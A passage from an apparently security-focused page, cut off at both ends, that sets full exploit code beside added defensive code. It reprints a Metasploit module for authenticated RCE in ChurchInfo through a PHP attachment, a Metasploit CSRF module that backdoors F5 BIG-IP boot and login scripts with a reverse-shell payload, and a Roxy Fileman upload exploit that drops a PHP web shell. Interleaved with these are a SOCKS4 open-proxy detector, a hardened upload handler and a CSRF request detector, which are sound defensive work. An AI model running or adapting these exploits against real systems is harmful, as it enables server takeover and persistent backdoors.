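    if raw_ip[:3] == b"\x00\x00\x00" and raw_ip[3] != 0:   # SOCKS4a: 0.0.0.x means a name follows
        rest = rest[nul + 1:]
        nul = rest.find(b"\x00")
        if nul < 0:
            return None
        hostname = rest[:nul].decode("latin-1")
    return {
        "command": "CONNECT" if data[1] == CONNECT else "BIND",
        "ip": str(ipaddress.IPv4Address(raw_ip)),
        "port": port,
        "hostname": hostname,
        "userid": userid,          # never verified by SOCKS4 servers: this is not authentication
    }


def parse_socks4_reply(data):
    """Decode VN=0 | CD | DSTPORT | DSTIP; CD 90 = granted, 91-93 = rejected."""
    if len(data) < 8 or data[0] != 0:
        return None
    return {"code": data[1], "granted": data[1] == GRANTED}


def find_open_proxies(flows, sanctioned_ports=frozenset()):
    """flows: (client, server, server_port, request_bytes, reply_bytes).
    One finding per granted CONNECT on a port that is not a sanctioned proxy."""
    findings = []
    for client, server, server_port, request, reply in flows:
        req = parse_socks4_request(request)
        rep = parse_socks4_reply(reply)
        if not req or not rep or req["command"] != "CONNECT":
            continue
        if rep["granted"] and server_port not in sanctioned_ports:
            target = req["hostname"] or req["ip"]
            findings.append(f"{server}:{server_port} relayed {client} -> {target}:{req['port']} (open SOCKS4 proxy)")
    return findings


def build_request(port, ip, userid=b"", hostname=None):
    """Constructed sample encoder (inverse of parse_socks4_request), used only for the demo."""
    data = bytes([4, CONNECT]) + struct.pack("!H", port) + ipaddress.IPv4Address(ip).packed + userid + b"\x00"
    if hostname:
        data += hostname.encode() + b"\x00"
    return data


SAMPLE_FLOWS = [
    # The advisory's scenario: relay on port 5555 granting a CONNECT to the internal FTP port.
    ("192.168.18.1", "192.168.18.125", 5555, build_request(21, "192.168.18.128"), bytes([0, GRANTED, 0, 0, 0, 0, 0, 0])),
    # Closed destination: reply 91, nothing was relayed.
    ("192.168.18.1", "192.168.18.125", 5555, build_request(666, "192.168.18.128"), bytes([0, REJECTED, 0, 0, 0, 0, 0, 0])),
    # SOCKS4a with a hostname, on the malware's default port from the advisory.
    ("203.0.113.5", "192.168.18.125", 21422, build_request(80, "0.0.0.1", b"x", "example.invalid"), bytes([0, GRANTED, 0, 0, 0, 0, 0, 0])),
    # Not SOCKS at all.
    ("203.0.113.5", "192.168.18.125", 80, b"GET / HTTP/1.1\r\n", b"HTTP/1.1 200 OK\r\n"),
]

if __name__ == "__main__":
    for finding in find_open_proxies(SAMPLE_FLOWS):
        print(finding)
```

<p>Because the reply is only eight bytes and the request has no handshake, a stream of short SOCKS4 exchanges to a non-proxy host is itself the indicator; pairing it with the destination ports (21, 80, a closed 666) from the same source is how the advisory's port-scan and file-download behaviour shows up in flow data.</p>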
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'ChurchInfo 1.2.13-1.3.0 Authenticated RCE',<br /> 'Description' => %q{<br /> This module exploits the logic in the CartView.php page when crafting a draft email with an attachment.<br /> By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the<br /> ChurchInfo web server, which is accessible over the web by any user. By uploading a PHP attachment and<br /> then browsing to the location of the uploaded PHP file on the web server, arbitrary code<br /> execution as the web daemon user (e.g. 
www-data) can be achieved.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [ 'm4lwhere <m4lwhere@protonmail.com>' ],<br /> 'References' => [<br /> ['URL', 'http://www.churchdb.org/'],<br /> ['URL', 'http://sourceforge.net/projects/churchinfo/'],<br /> ['CVE', '2021-43258']<br /> ],<br /> 'Platform' => 'php',<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_PHP,<br /> 'Targets' => [['Automatic Targeting', { 'auto' => true }]],<br /> 'DisclosureDate' => '2021-10-30', # Reported to ChurchInfo developers on this date<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => ['CRASH_SAFE'],<br /> 'Reliability' => ['REPEATABLE_SESSION'],<br /> 'SideEffects' => ['ARTIFACTS_ON_DISK', 'IOC_IN_LOGS']<br /> }<br /> )<br /> )<br /> # Set the email subject and message if interested<br /> register_options(<br /> [<br /> Opt::RPORT(80),<br /> OptString.new('USERNAME', [true, 'Username for ChurchInfo application', 'admin']),<br /> OptString.new('PASSWORD', [true, 'Password to login with', 'churchinfoadmin']),<br /> OptString.new('TARGETURI', [true, 'The location of the ChurchInfo app', '/churchinfo/']),<br /> OptString.new('EMAIL_SUBJ', [true, 'Email subject in webapp', 'Read this now!']),<br /> OptString.new('EMAIL_MESG', [true, 'Email message in webapp', 'Hello there!'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> if datastore['SSL'] == true<br /> proto_var = 'https'<br /> else<br /> proto_var = 'http'<br /> end<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'Default.php'),<br /> 'method' => 'GET',<br /> 'vars_get' => {<br /> 'Proto' => proto_var,<br /> 'Path' => target_uri.path<br /> }<br /> )<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to a request to its login page!')<br /> end<br /><br /> # Check if page title is the one that ChurchInfo uses for its login page.<br /> if res.body.match(%r{<title>ChurchInfo: Login</title>})<br /> print_good('Target is ChurchInfo!')<br /> 
else<br /> return CheckCode::Safe('Target is not running ChurchInfo!')<br /> end<br /><br /> # Check what version the target is running using the upgrade pages.<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_14To1_3_0.php'),<br /> 'method' => 'GET'<br /> )<br /><br /> if res && (res.code == 500 || res.code == 200)<br /> return CheckCode::Vulnerable('Target is running ChurchInfo 1.3.0!')<br /> end<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_13To1_2_14.php'),<br /> 'method' => 'GET'<br /> )<br /><br /> if res && (res.code == 500 || res.code == 200)<br /> return CheckCode::Vulnerable('Target is running ChurchInfo 1.2.14!')<br /> end<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'AutoUpdate', 'Update1_2_12To1_2_13.php'),<br /> 'method' => 'GET'<br /> )<br /><br /> if res && (res.code == 500 || res.code == 200)<br /> return CheckCode::Vulnerable('Target is running ChurchInfo 1.2.13!')<br /> else<br /> return CheckCode::Safe('Target is not running a vulnerable version of ChurchInfo!')<br /> end<br /> end<br /><br /> #<br /> # The exploit method attempts a login, adds items to the cart, then creates the email attachment.<br /> # Adding items to the cart is required for the server-side code to accept the upload.<br /> #<br /> def exploit<br /> # Need to grab the PHP session cookie value first to pass to application<br /> vprint_status('Gathering PHP session cookie')<br /> if datastore['SSL'] == true<br /> vprint_status('SSL is true, changing protocol to HTTPS')<br /> proto_var = 'https'<br /> else<br /> vprint_status('SSL is false, leaving protocol as HTTP')<br /> proto_var = 'http'<br /> end<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'Default.php'),<br /> 'method' => 'GET',<br /> 'vars_get' => {<br /> 'Proto' => proto_var,<br /> 'Path' => datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + datastore['TARGETURI']<br /> },<br /> 'keep_cookies' => true<br /> )<br /><br /> # Ensure we get a 200 from the application login page<br /> unless res && res.code == 200<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unable to reach the ChurchInfo login page (response code: #{res.code})")<br /> end<br /><br /> # Check that we actually are targeting a ChurchInfo server.<br /> unless res.body.match(%r{<title>ChurchInfo: Login</title>})<br /> fail_with(Failure::NotVulnerable, 'Target is not a ChurchInfo!')<br /> end<br /><br /> # Grab our assigned session cookie<br /> cookie = res.get_cookies<br /> vprint_good("PHP session cookie is #{cookie}")<br /> vprint_status('Attempting login')<br /><br /> # Attempt a login with the cookie assigned, server will assign privs on server-side if authenticated<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'Default.php'),<br /> 'method' => 'POST',<br /> 'vars_post' => {<br /> 'User' => datastore['USERNAME'],<br /> 'Password' => datastore['PASSWORD'],<br /> 'sURLPath' => datastore['TARGETURI']<br /> }<br /> )<br /><br /> # A valid login will give us a 302 redirect to TARGETURI + /CheckVersion.php so check that.<br /> unless res && res.code == 302 && res.headers['Location'] == datastore['TARGETURI'] + '/CheckVersion.php'<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Check if credentials are correct (response code: #{res.code})")<br /> end<br /> vprint_good("Location header is #{res.headers['Location']}")<br /> print_good("Logged into application as #{datastore['USERNAME']}")<br /> vprint_status('Attempting exploit')<br /><br /> # We must add items to the cart before we can send the emails. 
This is a hard requirement server-side.<br /> print_status('Navigating to add items to cart')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'SelectList.php'),<br /> 'method' => 'GET',<br /> 'vars_get' => {<br /> 'mode' => 'person',<br /> 'AddAllToCart' => 'Add+to+Cart'<br /> }<br /> )<br /><br /> # Need to check that items were successfully added to the cart<br /> # Here we're looking through html for the version string, similar to:<br /> # Items in Cart: 2<br /> unless res && res.code == 200<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unable to add items to cart via HTTP GET request to SelectList.php (response code: #{res.code})")<br /> end<br /> cart_items = res.body.match(/Items in Cart: (?<cart>\d)/)<br /> unless cart_items<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Server did not respond with the text 'Items in Cart'. Is this a ChurchInfo server?")<br /> end<br /> if cart_items['cart'].to_i < 1<br /> print_error('No items in cart detected')<br /> fail_with(Failure::UnexpectedReply,<br /> 'Failure to add items to cart, no items were detected. 
Check if there are person entries in the application')<br /> end<br /> print_good("Items in Cart: #{cart_items}")<br /><br /> # Uploading exploit as temporary email attachment<br /> print_good('Uploading exploit via temp email attachment')<br /> payload_name = Rex::Text.rand_text_alphanumeric(5..14) + '.php'<br /> vprint_status("Payload name is #{payload_name}")<br /><br /> # Create the POST payload with required parameters to be parsed by the server<br /> post_data = Rex::MIME::Message.new<br /> post_data.add_part(payload.encoded, 'application/octet-stream', nil,<br /> "form-data; name=\"Attach\"; filename=\"#{payload_name}\"")<br /> post_data.add_part(datastore['EMAIL_SUBJ'], '', nil, 'form-data; name="emailsubject"')<br /> post_data.add_part(datastore['EMAIL_MESG'], '', nil, 'form-data; name="emailmessage"')<br /> post_data.add_part('Save Email', '', nil, 'form-data; name="submit"')<br /> file = post_data.to_s<br /> file.strip!<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'CartView.php'),<br /> 'method' => 'POST',<br /> 'data' => file,<br /> 'ctype' => "multipart/form-data; boundary=#{post_data.bound}"<br /> )<br /><br /> # Ensure that we get a 200 and the intended payload was<br /> # successfully uploaded and attached to the draft email.<br /> unless res.code == 200 && res.body.include?("Attach file:</b> #{payload_name}")<br /> fail_with(Failure::Unknown, 'Failed to upload the payload.')<br /> end<br /> print_good("Exploit uploaded to #{target_uri.path + 'tmp_attach/' + payload_name}")<br /><br /> # Have our payload deleted after we exploit<br /> register_file_for_cleanup(payload_name)<br /><br /> # Make a GET request to the PHP file that was uploaded to execute it on the target server.<br /> print_good('Executing payload with GET request')<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'tmp_attach', payload_name),<br /> 'method' => 'GET'<br /> )<br /> rescue ::Rex::ConnectionError<br /> 
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")<br /> end<br />end<br /></code></pre>
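<p>The ChurchInfo module works because a draft-mail attachment is stored under the web root (<code>tmp_attach/</code>) with the client-supplied name, so a <code>.php</code> upload becomes a URL the server will execute. The handler below is an added defensive example, not ChurchInfo code, showing the three controls that each independently break that chain: an extension allowlist that looks at every extension in the name, a content check that refuses PHP open tags and mismatched magic bytes, and storage outside the document root under a server-chosen random name. The directory layout and allowlist are assumptions for the demo.</p>

```python
"""Attachment handling for a draft-mail feature like ChurchInfo's CartView.php,
hardened against the upload-to-webroot issue above: no executable extensions,
no client-chosen file names, storage outside the document root.  Added
defensive example, not ChurchInfo code; directory layout is an assumption."""
import os
import secrets
import tempfile

# Anything the web server (or a misconfigured handler) might execute.
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "pht",
                  "cgi", "pl", "py", "sh", "htaccess", "asp", "aspx", "jsp"}
ALLOWED_EXT = {"pdf", "txt", "png", "jpg", "jpeg", "gif", "docx", "xlsx"}
MAGIC = {"png": b"\x89PNG", "gif": b"GIF8", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "pdf": b"%PDF"}
MAX_BYTES = 5 * 1024 * 1024


class RejectedUpload(ValueError):
    pass


def check_filename(filename):
    """Return the lower-cased extension if the client-supplied name is acceptable."""
    base = os.path.basename(filename.replace("\\", "/"))        # strip any path component
    if not base or base.startswith(".") or "\x00" in base:
        raise RejectedUpload("empty, hidden or NUL-containing name")
    parts = base.lower().split(".")
    if len(parts) < 2:
        raise RejectedUpload("no extension")
    exts = parts[1:]                                              # x.php.png is still rejected
    if any(e in EXECUTABLE_EXT for e in exts):
        raise RejectedUpload(f"executable extension in {base!r}")
    if exts[-1] not in ALLOWED_EXT:
        raise RejectedUpload(f"extension .{exts[-1]} not allowed")
    return exts[-1]


def check_content(data, ext):
    """Cheap body checks so a PHP file renamed .png is not accepted either."""
    if len(data) > MAX_BYTES:
        raise RejectedUpload("too large")
    head = data[:4096]
    if b"<?php" in head or b"<?=" in head:
        raise RejectedUpload("PHP open tag in attachment body")
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        raise RejectedUpload(f"body does not look like a .{ext} file")


def store_attachment(filename, data, store_dir):
    """Write under store_dir (outside the web root) with a random server-chosen name.
    Returns (stored_path, original_name); keep the mapping in the draft record, not on disk."""
    ext = check_filename(filename)
    check_content(data, ext)
    os.makedirs(store_dir, mode=0o700, exist_ok=True)
    stored = os.path.join(store_dir, f"{secrets.token_hex(16)}.{ext}")
    with open(stored, "wb") as fh:
        fh.write(data)
    os.chmod(stored, 0o600)
    return stored, os.path.basename(filename)


def run_demo():
    """Constructed inputs: one benign attachment and four uploads that must be refused."""
    store = tempfile.mkdtemp(prefix="attach-")
    results = {}
    path, _ = store_attachment("minutes.txt", b"Agenda for Sunday\n", store)
    results["txt"] = os.path.dirname(path) == store and not path.endswith("minutes.txt")
    attempts = (
        ("shell.php", b"<?php echo 'hi'; ?>"),
        ("shell.php.png", b"\x89PNG\r\n"),
        ("image.png", b"<?php echo 'hi'; ?>"),
        ("../../var/www/x.php", b"x"),
    )
    for name, body in attempts:
        try:
            store_attachment(name, body, store)
            results[name] = "stored"
        except RejectedUpload as exc:
            results[name] = str(exc)
    return results


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name}: {outcome}")
```

<p>Even with all three checks, the directory that holds attachments should be served, if at all, through a download script that sets <code>Content-Disposition: attachment</code> and a fixed content type, never as static files the PHP handler can reach.</p>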
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'F5 BIG-IP iControl CSRF File Write SOAP API',<br /> 'Description' => %q{<br /> This module exploits a cross-site request forgery (CSRF) vulnerability<br /> in F5 Big-IP's iControl interface to write an arbitrary file to the<br /> filesystem.<br /><br /> While any file can be written to any location as root, the<br /> exploitability is limited by SELinux; the vast majority of writable<br /> locations are unavailable. By default, we write to a script that<br /> executes at reboot, which means the payload will execute the next time<br /> the server boots.<br /><br /> An alternate target - Login - will add a backdoor that executes next<br /> time a user logs in interactively. 
This overwrites a file,<br /> but we restore it when we get a session<br /><br /> Note that because this is a CSRF vulnerability, it starts a web<br /> server, but an authenticated administrator must visit the site, which<br /> redirects them to the target.<br /> },<br /> 'Author' => [<br /> 'Ron Bowes' # Discovery, PoC, and module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-41622'],<br /> ['URL', 'https://github.com/rbowes-r7/refreshing-soap-exploit'],<br /> ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],<br /> ['URL', 'https://support.f5.com/csp/article/K97843387'],<br /> ['URL', 'https://support.f5.com/csp/article/K94221585'],<br /> ['URL', 'https://support.f5.com/csp/article/K05403841'],<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DisclosureDate' => '2022-11-16', # Vendor advisory<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Type' => :unix_cmd,<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [ 'Restart', {}, ],<br /> [ 'Login', {}, ],<br /> [ 'Custom', {}, ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true,<br /> 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS,<br /> ARTIFACTS_ON_DISK<br /> ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGET_HOST', [true, 'The IP or domain name of the target F5 device']),<br /> OptString.new('TARGET_URI', [true, 'The URI of the SOAP API', '/iControl/iControlPortal.cgi']),<br /> OptBool.new('TARGET_SSL', [true, 'Use SSL for the upstream connection?', true]),<br /> OptString.new('FILENAME', [false, 'The file on the target to overwrite (for "custom" target) - note that SELinux prevents overwriting a great deal of useful 
files']),<br /> ]<br /> )<br /> end<br /><br /> def on_request_uri(socket, _request)<br /> if datastore['TARGET'] == 0 # restart<br /> filename = '/shared/f5_update_action'<br /> file_payload = <<~EOT<br /> UpdateAction<br /> https://localhost/success`#{payload.encoded}`<br /> https://localhost/error<br /> 0<br /> 0<br /> 0<br /> 0<br /> EOT<br /><br /> # Delete the logfile if we get a session<br /> register_file_for_cleanup('/var/log/f5_update_checker.out')<br /><br /> print_status("Redirecting the admin to overwrite #(unknown); if successful, your session will come approximately 2 minutes after the target is rebooted")<br /> elsif datastore['TARGET'] == 1 # login<br /> filename = '/var/run/config/timeout.sh'<br /> file_payload = "#{payload.encoded} & disown;"<br /><br /> # Delete the backdoored file if we get a session.. this will be fixed at<br /> # next reboot<br /> register_file_for_cleanup('/var/run/config/timeout.sh')<br /><br /> print_status("Redirecting the admin to overwrite #(unknown); if successful, your session will come the next time a user logs in interactively")<br /> else # Custom<br /><br /> filename = datastore['FILENAME']<br /> file_payload = payload.encoded<br /><br /> print_status("Redirecting the admin to overwrite #(unknown) with the payload")<br /> end<br /><br /> # Build the SOAP request that'll be sent to the target server<br /> csrf_payload = %(<br /> <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:con="urn:iControl:System/ConfigSync"><br /> <soapenv:Header/><br /> <soapenv:Body><br /> <con:upload_file soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><br /> <file_name xsi:type="xsd:string">#(unknown)</file_name><br /> <file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl"><br /> <!--type: Common.OctetSequence--><br /> <file_data 
xsi:type="urn:Common.OctetSequence">#{Rex::Text.encode_base64(file_payload)}</file_data><br /> <chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type><br /> </file_context><br /> </con:upload_file><br /> </soapenv:Body><br /></soapenv:Envelope><br /> )<br /><br /> # Build the target URL<br /> target_url = "#{datastore['TARGET_SSL'] ? 'https' : 'http'}://#{datastore['TARGET_HOST']}#{datastore['TARGET_URI']}"<br /><br /> # Build the HTML payload that'll send the SOAP request via the user's browser<br /> html_payload = %(<br /><html><br /> <body><br /> <form action="#{target_url}" method="POST" enctype="text/plain"><br /> <textarea id="payload" name="<!--">-->#{Rex::Text.html_encode(csrf_payload)}</textarea><br /> </form><br /> <script><br /> document.forms[0].submit();<br /> </script><br /> </body><br /></html><br /> )<br /><br /> # Send the HTML to the browser<br /> send_response(socket, html_payload, { 'Content-Type' => 'text/html' })<br /> end<br /><br /> def exploit<br /> # Sanity check<br /> if datastore['TARGET'] == 2 && (!datastore['FILENAME'] || datastore['FILENAME'].empty?)<br /> fail_with(Failure::BadConfig, 'For custom targets, please provide the FILENAME')<br /> end<br /><br /> print_good('Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below')<br /> super<br /> end<br />end<br /></code></pre>
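The module above makes the victim's browser deliver the SOAP request as a cross-site form post, and that delivery leaves recognisable traces: the envelope arrives as Content-Type: text/plain (the only type an enctype="text/plain" form can produce), the body opens with the `&lt;!--` form-field name that hides the "name=" prefix from the XML parser, and the Origin is the attacker's web server rather than the device itself. The detector below turns those traces into a check over captured requests to the iControl endpoint. It is an added example, not code from the Metasploit module or from F5; the host names, the sample requests and the SOAPAction heuristic (a SOAP 1.1 client normally sends that header, a browser form cannot) are assumptions.

```python
"""Flag CSRF-shaped iControl SOAP upload_file calls in captured HTTP requests.

Added example, not code from the Metasploit module above or from F5. Host
names and the sample requests are constructed; the SOAPAction check is a
heuristic (SOAP 1.1 clients send it, a browser form cannot).
"""
import base64
import re

# Default SOAP endpoint, the same path as the module's TARGET_URI option.
ICONTROL_PATH = "/iControl/iControlPortal.cgi"
UPLOAD_RE = re.compile(r"<(?:\w+:)?upload_file\b")
FILE_NAME_RE = re.compile(r"<file_name[^>]*>([^<]*)</file_name>")
FILE_DATA_RE = re.compile(r"<file_data[^>]*>([^<]*)</file_data>")
SOAP_TYPES = {"text/xml", "application/soap+xml", "application/xml"}


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def analyze_request(raw, device_hosts):
    """Return the reasons a request looks like a browser-delivered (CSRF) upload_file call.

    device_hosts: the management interface's own host names/IPs, used to decide
    whether an Origin header is cross-site. An empty list means no match.
    """
    method, path, headers, body = parse_request(raw)
    if method != "POST" or not path.startswith(ICONTROL_PATH) or not UPLOAD_RE.search(body):
        return []
    reasons = []
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype not in SOAP_TYPES:
        # A form with enctype="text/plain" can only produce text/plain.
        reasons.append(f"SOAP envelope sent as {ctype or '<no content-type>'}")
    if "soapaction" not in headers:
        reasons.append("no SOAPAction header")
    if body.lstrip().startswith("<!--"):
        # The form-field name opens an XML comment so the parser skips the "name=" prefix.
        reasons.append("body opens with an XML comment hiding the form-field name")
    origin = headers.get("origin")
    if origin:
        origin_host = origin.split("://", 1)[-1].split(":")[0].lower()
        if origin_host not in device_hosts:
            reasons.append(f"cross-site Origin {origin}")
    return reasons


def uploaded_file(raw):
    """Return (file_name, decoded contents) from an upload_file envelope, or None."""
    body = parse_request(raw)[3]
    name, data = FILE_NAME_RE.search(body), FILE_DATA_RE.search(body)
    if not name or not data:
        return None
    return name.group(1), base64.b64decode(data.group(1)).decode("utf-8", "replace")


def _envelope(file_name, contents):
    """Build a minimal ConfigSync upload_file envelope (constructed sample data)."""
    return (
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:con="urn:iControl:System/ConfigSync"><soapenv:Body><con:upload_file>'
        "<file_name>{}</file_name><file_context><file_data>{}</file_data>"
        "<chain_type>FILE_FIRST_AND_LAST</chain_type></file_context>"
        "</con:upload_file></soapenv:Body></soapenv:Envelope>"
    ).format(file_name, base64.b64encode(contents.encode()).decode())


# Constructed: what a browser emits for a text/plain form whose only field is
# named "<!--" (the shape the module's HTML page uses).
CSRF_SAMPLE = (
    "POST /iControl/iControlPortal.cgi HTTP/1.1\r\n"
    "Host: bigip.example.test\r\n"
    "Origin: http://attacker-site.example.test\r\n"
    "Content-Type: text/plain\r\n"
    "Authorization: Basic YWRtaW46ZXhhbXBsZQ==\r\n"
    "\r\n"
    "<!--=-->" + _envelope("/shared/f5_update_action", "constructed marker\n") + "\r\n"
)

# Constructed: the same operation issued by a real SOAP client.
LEGIT_SAMPLE = (
    "POST /iControl/iControlPortal.cgi HTTP/1.1\r\n"
    "Host: bigip.example.test\r\n"
    "Content-Type: text/xml; charset=utf-8\r\n"
    'SOAPAction: "urn:iControl:System/ConfigSync"\r\n'
    "Authorization: Basic YWRtaW46ZXhhbXBsZQ==\r\n"
    "\r\n" + _envelope("/var/tmp/constructed.txt", "constructed marker\n")
)
```

Run the two samples through analyze_request with the device's own host name as the only trusted origin: the legitimate call produces no findings, the browser-delivered one produces four, and uploaded_file recovers the path and contents the envelope would write, which is what an incident responder needs to check on disk.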
<pre><code># Exploit Title: Roxy Fileman <= 1.4.6 Arbitrary File Upload (Unauthenticated)<br /># Date: 11/12/2022<br /># Exploit Author: Hadi Mene <hadi_mene@hotmail.com><br /># Vendor Homepage: roxyfileman.com<br /># Software Link: https://web.archive.org/web/20210126213412/https://roxyfileman.com/download.php?f=1.4.6-php<br /># Version: <= 1.4.6<br /># Tested on: Ubuntu 18.04 <br /># CVE : CVE-2022-40797<br /><br /># https://nvd.nist.gov/vuln/detail/CVE-2022-40797 <br /><br />import requests<br />from optparse import OptionParser<br />from os.path import basename<br /><br />banner = '#################################################\n'<br />banner += '# Roxy Fileman <= 1.4.6 Arbitrary File Upload #\n'<br />banner += '#\t\t\t\t\t\t#\n'<br />banner += '#\tCVE-2022-40797 exploit code\t\t#\n'<br />banner += '#\t\t\t\t\t\t#\n'<br />banner += '#\t\t\t\t\t\t#\n'<br />banner += '# Author : Hadi Mene <hadi_mene@hotmail.com>\t#\n'<br />banner += '#\t\t\t\t\t\t#\n'<br />banner += '#################################################\n'<br /><br /><br />parser = OptionParser()<br />parser.add_option("-u", "--url", dest="url",<br /> help="url of roxy fileman installation")<br />parser.add_option("-s", "--shell",dest="shell", default=False,<br /> help="path of the php shell if not specified default shell will be uploaded ")<br /><br /><br />(options, args) = parser.parse_args()<br /><br /><br />if options.url is None:<br /> parser.error('URL is required use -h for help')<br /><br />url = options.url<br /><br />#It seems that in some versions of the app an '/' in the end of the url breaks the exploit code<br />if (url.endswith('/')):<br /> url = url[:-1] # we delete that '/'<br /> <br />webroot = options.url.split('/')[3:]<br />webroot = '/'+ '/'.join(webroot)<br /><br />if (webroot.endswith('/')):<br /> webroot = webroot[:-1]<br /> <br />webroot = webroot+'/Uploads'<br /><br />if options.shell:<br /> shell = open(options.shell,'r').read()<br /> filename = basename(options.shell)<br 
/> filename = filename.split('.')[0]<br /> <br />else:<br /> # default shell<br /> shell = "<?php system($_GET['cmd']); ?>"<br /> filename = 'shell'<br /><br /><br />headers = {<br /> 'Host': (url.split('/')[2]),<br /> 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',<br /> 'Accept': '*/*',<br /> 'Accept-Language': 'en-US,en;q=0.5',<br /> 'Content-Type': 'multipart/form-data; boundary=---------------------------39556237418830295983527604767',<br /> 'Origin': (url.split('/')[2]),<br /> 'Connection': 'close',<br />}<br /><br />data = '-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="method"\r\n\r\najax\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="d"\r\n\r\n'+(webroot)+'\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="files[]"; filename="'+(filename)+'.phar"\r\nContent-Type: text/plain\r\n\r\n'+shell+'\n\r\n-----------------------------39556237418830295983527604767--\r\n'<br /><br />#We check if a file with the same filename is already there <br />#because Roxy doesn't overwrite file instead it changes the filename of the newly uploaded file<br />if 'href="'+filename+'.phar"' in (requests.get(url+'/Uploads/').text):<br /> already_uploaded = True<br />else:<br /> already_uploaded = False<br /> <br /># file upload<br />req = requests.post(url+'/php/upload.php', headers=headers, data=data, verify=False)<br />response = (req.text)<br /><br />print(banner)<br /><br />if '{"res":"ok","msg":""}' in (response):<br /># success<br /> print('File Uploaded Successfully!!!')<br /> <br /> if already_uploaded:<br /> print('A file with the same filename is already on the server..')<br /> print('URL: '+url+'/Uploads/'+(filename)+' - Copy X.phar ')<br /> <br /> 
else:<br /> print('URL: '+url+'/Uploads/'+(filename)+'.phar')<br /><br />else:<br /> # failure<br /> print('Shell Upload Failed :((( ')<br /> print(response) #debug<br /><br /><br /></code></pre>
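The upload above succeeds because the file is stored under a `.phar` name the server never refuses and then executed by the PHP handler. The validator below is the hardened counterpart a defender would put in front of an upload directory: an allowlist applied to the last extension only, case-insensitively, with every inner dot folded away so no second extension survives, and a content check for PHP open tags and for the leading bytes of the declared type. It is an added example, not Roxy Fileman's code, and it does not model Roxy Fileman's configuration; the policy, magic numbers and sample file names are constructed. The audit helper at the end is the detection side of the same policy for an existing Uploads directory.

```python
"""Allowlist-based upload validation, the hardened counterpart of the upload the
exploit above abuses.

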